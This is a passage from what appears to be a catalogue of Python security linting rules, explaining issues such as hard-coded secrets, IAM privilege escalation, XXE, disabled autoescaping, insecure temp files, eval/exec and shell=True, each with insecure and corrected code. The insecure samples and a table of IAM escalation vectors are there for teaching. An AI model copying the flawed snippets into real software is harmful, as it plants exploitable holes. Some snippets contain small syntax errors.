    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)

        Domain(self, "Compliant",
            version=EngineVersion.OPENSEARCH_1_3,
            encryption_at_rest=EncryptionAtRestOptions(
                enabled=True
            )
        )

For aws_cdk.aws_opensearchservice.CfnDomain:

from aws_cdk.aws_opensearchservice import CfnDomain

class CfnDomainStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)

        CfnDomain(self, "Compliant",
            encryption_at_rest_options=CfnDomain.EncryptionAtRestOptionsProperty(
                enabled=True
            )
        )

See

python:S6437

Why is this an issue?

A hard-coded secret has been found in your code. You should quickly list where this secret is used, revoke it, and then change it in every system that uses it.

Passwords, secrets, and any type of credentials should only be used to authenticate a single entity (a person or a system).

If you allow third parties to authenticate as another system or person, they can impersonate legitimate identities and undermine trust within the organization.
It does not matter if the impersonation is malicious: In either case, it is a clear breach of trust in the system, as the systems involved falsely assume that the authenticated entity is who it claims to be.
The consequences can be catastrophic.

Keeping credentials in plain text in a code base is tantamount to sharing that password with anyone who has access to the source code and runtime servers.
Thus, it is a breach of trust, as these individuals have the ability to impersonate others.

Secret management services are the most efficient tools to store credentials and protect the identities associated with them.
Cloud providers and on-premise services can be used for this purpose.

If storing credentials in a secret data management service is not possible, follow these guidelines:

  • Do not store credentials in a file that an excessive number of people can access.
    • For example, not in code, not in a spreadsheet, not on a sticky note, and not on a shared drive.
  • Use the production operating system to protect password access control.
    • For example, in a file whose permissions are restricted and protected with chmod and chown.

Noncompliant code example

from requests_oauthlib.oauth2_session import OAuth2Session

scope = ['https://www.api.example.com/auth/example.data']

oauth = OAuth2Session(
    'example_client_id',
    redirect_uri='https://callback.example.com/uri',
    scope=scope)

token = oauth.fetch_token(
        'https://api.example.com/o/oauth2/token',
        client_secret='example_Password') # Noncompliant

data = oauth.get('https://www.api.example.com/oauth2/v1/exampledata')

Compliant solution

Using AWS Secrets Manager:

import boto3
from requests_oauthlib.oauth2_session import OAuth2Session

def get_client_secret():

    session = boto3.session.Session()
    client = session.client(service_name='secretsmanager', region_name='eu-west-1')

    return client.get_secret_value(SecretId='example_oauth_secret_id')

client_secret = get_client_secret()
scope = ['https://www.api.example.com/auth/example.data']

oauth = OAuth2Session(
    'example_client_id',
    redirect_uri='https://callback.example.com/uri',
    scope=scope)

token = oauth.fetch_token(
        'https://api.example.com/o/oauth2/token',
        client_secret=client_secret)

data = oauth.get('https://www.api.example.com/oauth2/v1/exampledata')

Using Azure Key Vault Secret:

from azure.keyvault.secrets import SecretClient
from azure.identity import DefaultAzureCredential

def get_client_secret():
    vault_uri = "https://example.vault.azure.net"
    credential = DefaultAzureCredential()
    client = SecretClient(vault_url=vault_uri, credential=credential)

    return client.get_secret('example_oauth_secret_name')

client_secret = get_client_secret()
scope = ['https://www.api.example.com/auth/example.data']

oauth = OAuth2Session(
    'example_client_id',
    redirect_uri='https://callback.example.com/uri',
    scope=scope)

token = oauth.fetch_token(
        'https://api.example.com/o/oauth2/token',
        client_secret=client_secret)

data = oauth.get('https://www.api.example.com/oauth2/v1/exampledata')

Resources

python:S6317

Why is this an issue?

AWS Identity and Access Management (IAM) is the service that defines access to AWS resources. One of the core components of IAM is the policy which, when attached to an identity or a resource, defines its permissions. Policies granting permission to an Identity (a User, a Group or Role) are called identity-based policies. They add the ability to an identity to perform a predefined set of actions on a list of resources.

Here is an example of a policy document defining a limited set of permission that grants a user the ability to manage his own access keys.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "iam:CreateAccessKey",
                "iam:DeleteAccessKey",
                "iam:ListAccessKeys",
                "iam:UpdateAccessKey"
            ],
            "Resource": "arn:aws:iam::245500951992:user/${aws:username}",
            "Effect": "Allow",
            "Sid": "AllowManageOwnAccessKeys"
        }
    ]
}

Privilege escalation generally happens when an identity policy gives an identity the ability to grant more privileges than the ones it already has. Here is another example of a policy document that hides a privilege escalation. It allows an identity to generate a new access key for any user from the account, including users with high privileges.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "iam:CreateAccessKey",
                "iam:DeleteAccessKey",
                "iam:ListAccessKeys",
                "iam:UpdateAccessKey"
            ],
            "Resource": "*",
            "Effect": "Allow",
            "Sid": "AllowManageOwnAccessKeys"
        }
    ]
}

Although it looks like it grants a limited set of permissions, this policy would, in practice, give the highest privileges to the identity it’s attached to.

Privilege escalation is a serious issue as it allows a malicious user to easily escalate to a high privilege identity from a low privilege identity it took control of.

The example above is just one of many permission escalation vectors. Here is the list of vectors that the rule can detect:

Vector nameSummary

Create Policy Version

Create a new IAM policy and set it as default

Set Default Policy Version

Set a different IAM policy version as default

Create AccessKey

Create a new access key for any user

Create Login Profile

Create a login profile with a password chosen by the attacker

Update Login Profile

Update the existing password with one chosen by the attacker

Attach User Policy

Attach a permissive IAM policy like "AdministratorAccess" to a user the attacker controls

Attach Group Policy

Attach a permissive IAM policy like "AdministratorAccess" to a group containing a user the attacker controls

Attach Role Policy

Attach a permissive IAM policy like "AdministratorAccess" to a role that can be assumed by the user the attacker controls

Put User Policy

Alter the existing inline IAM policy from a user the attacker controls

Put Group Policy

Alter the existing inline IAM policy from a group containing a user that the attacker controls

Put Role Policy

Alter an existing inline IAM role policy. The rule will then be assumed by the user that the attacker controls

Add User to Group

Add a user that the attacker controls to a group that has a larger range of permissions

Update Assume Role Policy

Update a role’s "AssumeRolePolicyDocument" to allow a user the attacker controls to assume it

EC2

Create an EC2 instance that will execute with high privileges

Lambda Create and Invoke

Create a Lambda function that will execute with high privileges and invoke it

Lambda Create and Add Permission

Create a Lambda function that will execute with high privileges and grant permission to invoke it to a user or a service

Lambda triggered with an external event

Create a Lambda function that will execute with high privileges and link it to an external event

Update Lambda code

Update the code of a Lambda function executing with high privileges

CloudFormation

Create a CloudFormation stack that will execute with high privileges

Data Pipeline

Create a Pipeline that will execute with high privileges

Glue Development Endpoint

Create a Glue Development Endpoint that will execute with high privileges

Update Glue Dev Endpoint

Update the associated SSH key for the Glue endpoint

The general recommendation to protect against privilege escalation is to restrict the resources to which sensitive permissions are granted. The first example above is a good demonstration of sensitive permissions being used with a narrow scope of resources and where no privilege escalation is possible.

Noncompliant code example

The following policy allows an attacker to update the code of any Lambda function. An attacker can achieve privilege escalation by altering the code of a Lambda that executes with high privileges.

from aws_cdk.aws_iam import Effect, PolicyDocument, PolicyStatement

PolicyDocument(
    statements=[
        PolicyStatement(
            effect=Effect.ALLOW,
            actions=["lambda:UpdateFunctionCode"],
            resources=["*"]  # Noncompliant
        )
    ]
)

Compliant solution

Narrow the policy such that only updates to the code of certain Lambda functions are allowed.

from aws_cdk.aws_iam import Effect, PolicyDocument, PolicyStatement

PolicyDocument(
    statements=[
        PolicyStatement(
            effect=Effect.ALLOW,
            actions=["lambda:UpdateFunctionCode"],
            resources=[
                "arn:aws:lambda:us-east-2:123456789012:function:my-function:1"
            ]
        )
    ]
)

Resources

python:S2077

Formatted SQL queries can be difficult to maintain, debug and can increase the risk of SQL injection when concatenating untrusted values into the query. However, this rule doesn’t detect SQL injections (unlike rule S3649), the goal is only to highlight complex/formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Sensitive Code Example

from django.db import models
from django.db import connection
from django.db import connections
from django.db.models.expressions import RawSQL

value = input()


class MyUser(models.Model):
    name = models.CharField(max_length=200)


def query_my_user(request, params, value):
    with connection.cursor() as cursor:
        cursor.execute("{0}".format(value))  # Sensitive

    # https://docs.djangoproject.com/en/2.1/ref/models/expressions/#raw-sql-expressions

    RawSQL("select col from %s where mycol = %s and othercol = " + value, ("test",))  # Sensitive

    # https://docs.djangoproject.com/en/2.1/ref/models/querysets/#extra

    MyUser.objects.extra(
        select={
            'mycol':  "select col from sometable here mycol = %s and othercol = " + value}, # Sensitive
           select_params=(someparam,),
        },
    )

Compliant Solution

cursor = connection.cursor(prepared=True)
sql_insert_query = """ select col from sometable here mycol = %s and othercol = %s """

select_tuple = (1, value)

cursor.execute(sql_insert_query, select_tuple) # Compliant, the query is parameterized
connection.commit()

See

python:S6319

Amazon SageMaker is a managed machine learning service in a hosted production-ready environment. To train machine learning models, SageMaker instances can process potentially sensitive data, such as personal information that should not be stored unencrypted. In the event that adversaries physically access the storage media, they cannot decrypt encrypted data.

Ask Yourself Whether

  • The instance contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SageMaker notebook instances that contain sensitive information. Encryption and decryption are handled transparently by SageMaker, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_sagemaker.CfnNotebookInstance:

from aws_cdk import (
    aws_sagemaker as sagemaker
)

class CfnSagemakerStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)

        sagemaker.CfnNotebookInstance(
            self, "Sensitive",
            instance_type="instanceType",
            role_arn="roleArn"
        )  # Sensitive, no KMS key is set by default; thus, encryption is disabled

Compliant Solution

For aws_cdk.aws_sagemaker.CfnNotebookInstance:

from aws_cdk import (
    aws_sagemaker as sagemaker,
    aws_kms as kms
)

class CfnSagemakerStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)

        my_key = kms.Key(self, "Key")
        sagemaker.CfnNotebookInstance(
            self, "Compliant",
            instance_type="instanceType",
            role_arn="roleArn",
            kms_key_id=my_key.key_id
        )

See

python:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in Python Standard Library

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

import xml.sax

parser = xml.sax.make_parser()
myHandler = MyHandler()
parser.setContentHandler(myHandler)
parser.setFeature(feature_external_ges, True) # Noncompliant
parser.parse('xxe.xml')

Compliant solution

The SAX parser does not process general external entities by default since version 3.7.1.

import xml.sax

parser = xml.sax.make_parser()
myHandler = MyHandler()
parser.setContentHandler(myHandler)
parser.setFeature(feature_external_ges, False)
parser.parse('xxe.xml')

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.

Resources

Standards

python:S5439

This rule is deprecated; use S5247 instead.

Why is this an issue?

Template engines have an HTML autoescape mechanism that protects web applications against most common cross-site-scripting (XSS) vulnerabilities.

By default, it automatically replaces HTML special characters in any template variables. This secure by design configuration should not be globally disabled.

Escaping HTML from template variables prevents switching into any execution context, like <script>. Disabling autoescaping forces developers to manually escape each template variable for the application to be safe. A more pragmatic approach is to escape by default and to manually disable escaping when needed.

A successful exploitation of a cross-site-scripting vulnerability by an attacker allow him to execute malicious JavaScript code in a user’s web browser. The most severe XSS attacks involve:

  • Forced redirection
  • Modify presentation of content
  • User accounts takeover after disclosure of sensitive information like session cookies or passwords

This rule supports the following libraries:

Noncompliant code example

from jinja2 import Environment

env = Environment() # Noncompliant; New Jinja2 Environment has autoescape set to false
env = Environment(autoescape=False) # Noncompliant

Compliant solution

from jinja2 import Environment
env = Environment(autoescape=True) # Compliant

Resources

python:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, it has led to the following vulnerabilities:

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see examples bellow). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such API will make sure:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
    • The file will be destroyed as soon as it is closed

Sensitive Code Example

file = open("/tmp/temporary_file","w+") # Sensitive
tmp_dir = os.environ.get('TMPDIR') # Sensitive
file = open(tmp_dir+"/temporary_file","w+")

Compliant Solution

import tempfile

file = tempfile.TemporaryFile(dir="/tmp/my_subdirectory", mode='"w+") # Compliant

See

python:S5445

Temporary files are considered insecurely created when the file existence check is performed separately from the actual file creation. Such a situation can occur when creating temporary files using normal file handling functions or when using dedicated temporary file handling functions that are not atomic.

Why is this an issue?

Creating temporary files in a non-atomic way introduces race condition issues in the application’s behavior. Indeed, a third party can create a given file between when the application chooses its name and when it creates it.

In such a situation, the application might use a temporary file that it does not entirely control. In particular, this file’s permissions might be different than expected. This can lead to trust boundary issues.

What is the potential impact?

Attackers with control over a temporary file used by a vulnerable application will be able to modify it in a way that will affect the application’s logic. By changing this file’s Access Control List or other operating system-level properties, they could prevent the file from being deleted or emptied. They may also alter the file’s content before or while the application uses it.

Depending on why and how the affected temporary files are used, the exploitation of a race condition in an application can have various consequences. They can range from sensitive information disclosure to more serious application or hosting infrastructure compromise.

Information disclosure

Because attackers can control the permissions set on temporary files and prevent their removal, they can read what the application stores in them. This might be especially critical if this information is sensitive.

For example, an application might use temporary files to store users' session-related information. In such a case, attackers controlling those files can access session-stored information. This might allow them to take over authenticated users' identities and entitlements.

Attack surface extension

An application might use temporary files to store technical data for further reuse or as a communication channel between multiple components. In that case, it might consider those files part of the trust boundaries and use their content without additional security validation or sanitation. In such a case, an attacker controlling the file content might use it as an attack vector for further compromise.

For example, an application might store serialized data in temporary files for later use. In such a case, attackers controlling those files' content can change it in a way that will lead to an insecure deserialization exploitation. It might allow them to execute arbitrary code on the application hosting server and take it over.

How to fix it

Code examples

The following code example is vulnerable to a race condition attack because it creates a temporary file using an unsafe API function.

Noncompliant code example

import tempfile

filename = tempfile.mktemp() # Noncompliant
tmp_file = open(filename, "w+")

Compliant solution

import tempfile

tmp_file1 = tempfile.NamedTemporaryFile(delete=False)
tmp_file2 = tempfile.NamedTemporaryFile()

How does this work?

Applications should create temporary files so that no third party can read or modify their content. It requires that the files' name, location, and permissions are carefully chosen and set. This can be achieved in multiple ways depending on the applications' technology stacks.

Use a secure API function

Temporary files handling APIs generally provide secure functions to create temporary files. In most cases, they operate in an atomical way, creating and opening a file with a unique and unpredictable name in a single call. Those functions can often be used to replace less secure alternatives without requiring important development efforts.

Here, the example compliant code uses the more secure tempfile.NamedTemporaryFile function to handle the temporary file creation.

Strong security controls

Temporary files can be created using unsafe functions and API as long as strong security controls are applied. Non-temporary file-handling functions and APIs can also be used for that purpose.

In general, applications should ensure that attackers can not create a file before them. This turns into the following requirements when creating the files:

  • Files should be created in a non-public directory.
  • File names should be unique.
  • File names should be unpredictable. They should be generated using a cryptographically secure random generator.
  • File creation should fail if a target file already exists.

Moreover, when possible, it is recommended that applications destroy temporary files after they have finished using them.

Resources

Documentation

Standards

  • OWASP - Top 10 2021 - A01:2021 - Broken Access Control
  • OWASP - Top 10 2017 - A9:2017 - Using Components with Known Vulnerabilities
  • MITRE - CWE-377: Insecure Temporary File
  • MITRE - CWE-379: Creation of Temporary File in Directory with Incorrect Permissions
python:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

For os.umask:

os.umask(0)  # Sensitive

For os.chmod, os.lchmod, and os.fchmod:

os.chmod("/tmp/fs", stat.S_IRWXO)   # Sensitive
os.lchmod("/tmp/fs", stat.S_IRWXO)  # Sensitive
os.fchmod(fd, stat.S_IRWXO)         # Sensitive

Compliant Solution

For os.umask:

os.umask(0o777)

For os.chmod, os.lchmod, and os.fchmod:

os.chmod("/tmp/fs", stat.S_IRWXU)
os.lchmod("/tmp/fs", stat.S_IRWXU)
os.fchmod(fd, stat.S_IRWXU)

See

python:S1523

This rule is deprecated, and will eventually be removed.

Executing code dynamically is security-sensitive. It has led in the past to the following vulnerabilities:

Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific meta-programming use-cases. However most of the time their use is frowned upon because they also increase the risk of maliciously Injected Code. Such attacks can either run on the server or in the client (example: XSS attack) and have a huge impact on an application’s security.

This rule marks for review each occurrence of such dynamic code execution. This rule does not detect code injections. It only highlights the use of APIs which should be used sparingly and very carefully.

Ask Yourself Whether

  • the executed code may come from an untrusted source and hasn’t been sanitized.
  • you really need to run code dynamically.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Regarding the execution of unknown code, the best solution is to not run code provided by an untrusted source. If you really need to do it, run the code in a sandboxed environment. Use jails, firewalls and whatever means your operating system and programming language provide (example: Security Managers in java, iframes and same-origin policy for javascript in a web browser).

Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.

Avoid using dynamic code APIs whenever possible. Hard-coded code is always safer.

Sensitive Code Example

import os

value = input()
command = 'os.system("%s")' % value

def evaluate(command, file, mode):
    eval(command)  # Sensitive.

eval(command)  # Sensitive. Dynamic code

def execute(code, file, mode):
    exec(code)  # Sensitive.
    exec(compile(code, file, mode))  # Sensitive.

exec(command)  # Sensitive.

See

python:S2053

This vulnerability increases the likelihood that attackers are able to compute the cleartext of password hashes.

Why is this an issue?

During the process of password hashing, an additional component, known as a "salt," is often integrated to bolster the overall security. This salt, acting as a defensive measure, primarily wards off certain types of attacks that leverage pre-computed tables to crack passwords.

However, potential risks emerge when the salt is deemed insecure. This can occur when the salt is consistently the same across all users or when it is too short or predictable. In scenarios where users share the same password and salt, their password hashes will inevitably mirror each other. Similarly, a short salt heightens the probability of multiple users unintentionally having identical salts, which can potentially lead to identical password hashes. These identical hashes streamline the process for potential attackers to recover clear-text passwords. Thus, the emphasis on implementing secure, unique, and sufficiently lengthy salts in password-hashing functions is vital.

What is the potential impact?

Despite best efforts, even well-guarded systems might have vulnerabilities that could allow an attacker to gain access to the hashed passwords. This could be due to software vulnerabilities, insider threats, or even successful phishing attempts that give attackers the access they need.

Once the attacker has these hashes, they will likely attempt to crack them using a couple of methods. One is brute force, which entails trying every possible combination until the correct password is found. While this can be time-consuming, having the same salt for all users or a short salt can make the task significantly easier and faster.

If multiple users have the same password and the same salt, their password hashes would be identical. This means that if an attacker successfully cracks one hash, they have effectively cracked all identical ones, granting them access to multiple accounts at once.

A short salt, while less critical than a shared one, still increases the odds of different users having the same salt. This might create clusters of password hashes with identical salt that can then be attacked as explained before.

With short salts, the probability of a collision between two users' passwords and salts couple might be low depending on the salt size. The shorter the salt, the higher the collision probability. In any case, using longer, cryptographically secure salt should be preferred.

How to fix it in Python Standard Library

Code examples

The following code contains examples of hard-coded salts.

Noncompliant code example

import crypt

hash = crypt.crypt(password) # Noncompliant

Compliant solution

import crypt

salt = crypt.mksalt(crypt.METHOD_SHA256)
hash = crypt.crypt(password, salt)

How does this work?

This code ensures that each user’s password has a unique salt value associated with it. It generates a salt randomly and with a length that provides the required security level. It uses a salt length of at least 16 bytes (128 bits), as recommended by industry standards.

Here, the compliant code example ensures the salt is random and has a sufficient length by calling the crypt.mksalt function. This one internally uses a cryptographically secure pseudo random number generator.

Resources

Standards

  • OWASP Top 10:2021 A02:2021 - Cryptographic Failures
  • OWASP - Top 10 2017 - A03:2017 - Sensitive Data Exposure
  • CWE - CWE-759: Use of a One-Way Hash without a Salt
  • CWE - CWE-760: Use of a One-Way Hash with a Predictable Salt
python:S4721

This rule is deprecated, and will eventually be removed.

Arbitrary OS command injection vulnerabilities are more likely when a shell is spawned rather than a new process, indeed shell meta-chars can be used (when parameters are user-controlled for instance) to inject OS commands.

Ask Yourself Whether

  • OS command name or parameters are user-controlled.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use functions that don’t spawn a shell.

Sensitive Code Example

Python 3

subprocess.run(cmd, shell=True)  # Sensitive
subprocess.Popen(cmd, shell=True)  # Sensitive
subprocess.call(cmd, shell=True)  # Sensitive
subprocess.check_call(cmd, shell=True)  # Sensitive
subprocess.check_output(cmd, shell=True)  # Sensitive
os.system(cmd)  # Sensitive: a shell is always spawn

Python 2

cmd = "when a string is passed through these function, a shell is spawn"
(_, child_stdout, _) = os.popen2(cmd)  # Sensitive
(_, child_stdout, _) = os.popen3(cmd)  # Sensitive
(_, child_stdout) = os.popen4(cmd)  # Sensitive


(child_stdout, _) = popen2.popen2(cmd)  # Sensitive
(child_stdout, _, _) = popen2.popen3(cmd)  # Sensitive
(child_stdout, _) = popen2.popen4(cmd)  # Sensitive

Compliant Solution

Python 3

# by default shell=False, a shell is not spawn
subprocess.run(cmd)  # Compliant
subprocess.Popen(cmd)  # Compliant
subprocess.call(cmd)  # Compliant
subprocess.check_call(cmd)  # Compliant
subprocess.check_output(cmd)  # Compliant

# always in a subprocess:
os.spawnl(mode, path, *cmd)  # Compliant
os.spawnle(mode, path, *cmd, env)  # Compliant
os.spawnlp(mode, file, *cmd)  # Compliant
os.spawnlpe(mode, file, *cmd, env)  # Compliant
os.spawnv(mode, path, cmd)  # Compliant
os.spawnve(mode, path, cmd, env)  # Compliant
os.spawnvp(mode, file, cmd)  # Compliant
os.spawnvpe(mode, file, cmd, env)  # Compliant

(child_stdout) = os.popen(cmd, mode, 1)  # Compliant
(_, output) = subprocess.getstatusoutput(cmd)  # Compliant
out = subprocess.getoutput(cmd)  # Compliant
os.startfile(path)  # Compliant
os.execl(path, *cmd)  # Compliant
os.execle(path, *cmd, env)  # Compliant
os.execlp(file, *cmd)  # Compliant
os.execlpe(file, *cmd, env)  # Compliant
os.execv(path, cmd)  # Compliant
os.execve(path, cmd, env)  # Compliant
os.execvp(file, cmd)  # Compliant
os.execvpe(file, cmd, env)  # Compliant

Python 2

cmdsargs = ("use", "a", "sequence", "to", "directly", "start", "a", "subprocess")

(_, child_stdout) = os.popen2(cmdsargs)  # Compliant
(_, child_stdout, _) = os.popen3(cmdsargs)  # Compliant
(_, child_stdout) = os.popen4(cmdsargs)  # Compliant

(child_stdout, _) = popen2.popen2(cmdsargs)  # Compliant
(child_stdout, _, _) = popen2.popen3(cmdsargs)  # Compliant
(child_stdout, _) = popen2.popen4(cmdsargs)  # Compliant

See

python:S3752

An HTTP method is safe when used to perform a read-only operation, such as retrieving information. In contrast, an unsafe HTTP method is used to change the state of an application, for instance to update a user’s profile on a web application.

Common safe HTTP methods are GET, HEAD, or OPTIONS.

Common unsafe HTTP methods are POST, PUT and DELETE.

Allowing both safe and unsafe HTTP methods to perform a specific operation on a web application could impact its security, for example CSRF protections are most of the time only protecting operations performed by unsafe HTTP methods.

Ask Yourself Whether

  • HTTP methods are not defined at all for a route/controller of the application.
  • Safe HTTP methods are defined and used for a route/controller that can change the state of an application.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

For all the routes/controllers of an application, the authorized HTTP methods should be explicitly defined and safe HTTP methods should only be used to perform read-only operations.

Sensitive Code Example

For Django:

# No method restriction
def view(request):  # Sensitive
    return HttpResponse("...")
@require_http_methods(["GET", "POST"])  # Sensitive
def view(request):
    return HttpResponse("...")

For Flask:

@methods.route('/sensitive', methods=['GET', 'POST'])  # Sensitive
def view():
    return Response("...", 200)

Compliant Solution

For Django:

@require_http_methods(["POST"])
def view(request):
    return HttpResponse("...")
@require_POST
def view(request):
    return HttpResponse("...")
@require_GET
def view(request):
    return HttpResponse("...")
@require_safe
def view(request):
    return HttpResponse("...")

For Flask:

@methods.route('/compliant1')
def view():
    return Response("...", 200)
@methods.route('/compliant2', methods=['GET'])
def view():
    return Response("...", 200)

See

python:S6463

Allowing unrestricted outbound communications can lead to data leaks.

A restrictive security group is an additional layer of protection that might prevent the abuse or exploitation of a resource. For example, it complicates the exfiltration of data in the case of a successfully exploited vulnerability.

When deciding if outgoing connections should be limited, consider that limiting the connections results in additional administration and maintenance work.

Ask Yourself Whether

  • The resource has access to sensitive data.
  • The resource is part of a private network.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to restrict outgoing connections to a set of trusted destinations.

Sensitive Code Example

For aws_cdk.aws_ec2.SecurityGroup:

from aws_cdk import (
    aws_ec2 as ec2
)

ec2.SecurityGroup(  # Sensitive; allow_all_outbound is enabled by default
    self,
    "example",
    vpc=vpc
)

Compliant Solution

For aws_cdk.aws_ec2.SecurityGroup:

from aws_cdk import (
    aws_ec2 as ec2
)

sg = ec2.SecurityGroup(
    self,
    "example",
    vpc=vpc,
    allow_all_outbound=False
)

sg.add_egress_rule(
    peer=ec2.Peer.ipv4("203.0.113.127/32"),
    connection=ec2.Port.tcp(443)
)

See

python:S6327

Amazon Simple Notification Service (SNS) is a managed messaging service for application-to-application (A2A) and application-to-person (A2P) communication. SNS topics allows publisher systems to fanout messages to a large number of subscriber systems. Amazon SNS allows to encrypt messages when they are received. In the case that adversaries gain physical access to the storage medium or otherwise leak a message they are not able to access the data.

Ask Yourself Whether

  • The topic contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SNS topics that contain sensitive information. Encryption and decryption are handled transparently by SNS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_sns.Topic:

from aws_cdk import (
    aws_sns as sns
)

class TopicStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        sns.Topic( # Sensitive, unencrypted by default
            self,
            "example"
        )

For aws_cdk.aws_sns.CfnTopic:

from aws_cdk import (
    aws_sns as sns
)

class TopicStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        sns.CfnTopic( # Sensitive, unencrypted by default
            self,
            "example"
        )

Compliant Solution

For aws_cdk.aws_sns.Topic:

from aws_cdk import (
    aws_sns as sns
)

class TopicStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        my_key = kms.Key(self, "key")
        sns.Topic(
            self,
            "example",
            master_key=my_key
        )

For aws_cdk.aws_sns.CfnTopic:

from aws_cdk import (
    aws_sns as sns
)

class TopicStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        my_key = kms.Key(self, "key")
        sns.CfnTopic(
            self,
            "example",
            kms_master_key_id=my_key.key_id
        )

See

python:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

ip = '192.168.12.42'
sock = socket.socket()
sock.bind((ip, 9090))

Compliant Solution
